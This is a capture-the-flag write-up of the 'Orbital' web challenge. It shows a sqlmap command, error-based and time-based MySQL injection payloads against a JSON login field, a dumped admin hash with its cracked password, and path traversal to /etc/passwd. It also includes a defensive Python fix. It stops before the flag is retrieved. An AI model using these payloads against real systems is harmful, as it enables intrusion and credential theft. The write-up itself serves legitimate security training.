web

Cyber Apocalypse 2023

Orbital

Solved by Legend

Challenge description

In order to decipher the alien communication that held the key to their location, she needed access to a decoder with advanced capabilities - a decoder that only The Orbital firm possessed. Can you get your hands on the decoder?

This challenge also presents a login page.

With no user information or credentials in the source code, I checked the Docker files.

This challenge is similar to the Drobots challenge: it runs a Flask application backed by MySQL, so I looked into the Dockerfile.

The config.py file contains the database configuration.

database.py contains the database logic along with the hint, but it is modified slightly: this time the password is verified with passwordVerify.

I again saved the login request and fed it to sqlmap, which gave me the token and also brute-forced the password.

sqlmap -r ./req --dbms=mysql -D orbital -T users --dump


---
Parameter: JSON username ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: {"username":"a"="a" AND (SELECT 2720 FROM(SELECT COUNT(*),CONCAT(0x716a7a6271,(SELECT (ELT(2720=2720,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "a"="a","password":"a"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"username":"a"="a" AND (SELECT 1000 FROM (SELECT(SLEEP(5)))dfxy) AND "a"="a","password":"a"}
---


+----+-------------------------------------------------+----------+
| id | password                                        | username |
+----+-------------------------------------------------+----------+
| 1  | 1692b753c031f2905b89e7258dbc49bb (ichliebedich) | admin    |
+----+-------------------------------------------------+----------+

Once logged in, the functionality of the website was different.

Next I checked the routes.py file, which contains the application logic. In the communication logic, the hint was that no character escaping is applied to the filename.

Then I tried path traversal to read the /etc/passwd file, and it worked.
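As an added example (not the challenge's own code) of how the two weaknesses used above would be closed, the snippet below pairs a parameter-bound login lookup with a filename check that confines downloads to one directory. It assumes a users table with the dumped columns (id, password, username), that the stored password is an MD5 hex digest like the 32-character value in the dump, and a download directory named "communications"; sqlite3 stands in for MySQL, since parameter binding has the same shape.

```python
import hashlib
import hmac
import os
import sqlite3  # stand-in for the challenge's MySQL; parameter binding works the same way
from typing import Optional

COMM_DIR = os.path.realpath("communications")  # assumed directory the download route serves


def resolve_download_path(filename: str, base_dir: str = COMM_DIR) -> Optional[str]:
    """Return an absolute path for `filename` only if it stays inside `base_dir`.

    The check runs on the realpath of the joined result, so '../' sequences,
    absolute filenames and symlink escapes are all rejected, not just literal
    '..' substrings (which a naive string filter would miss).
    """
    if not filename:
        return None
    candidate = os.path.realpath(os.path.join(base_dir, filename))
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        return None
    return candidate


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample table with the same columns as the dumped one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, password TEXT, username TEXT)")
    # Assumption: the stored value is an MD5 hex digest, matching the 32-hex-char
    # field in the dump. A production app would use a slow, salted hash instead.
    conn.execute("INSERT INTO users (password, username) VALUES (?, ?)",
                 (hashlib.md5(b"demo-password").hexdigest(), "admin"))
    return conn


def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bind the username as a parameter so it can never change the query's shape."""
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    supplied = hashlib.md5(password.encode()).hexdigest()
    return hmac.compare_digest(row[0], supplied)  # constant-time comparison
```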

For this challenge they changed the flag's location from flag.txt to /signal_sleuth_firmware in the root directory, as written in the Docker config.

COPY flag.txt /signal_sleuth_firmware

Now we need to get the flag.

Published on: 27 Mar 2023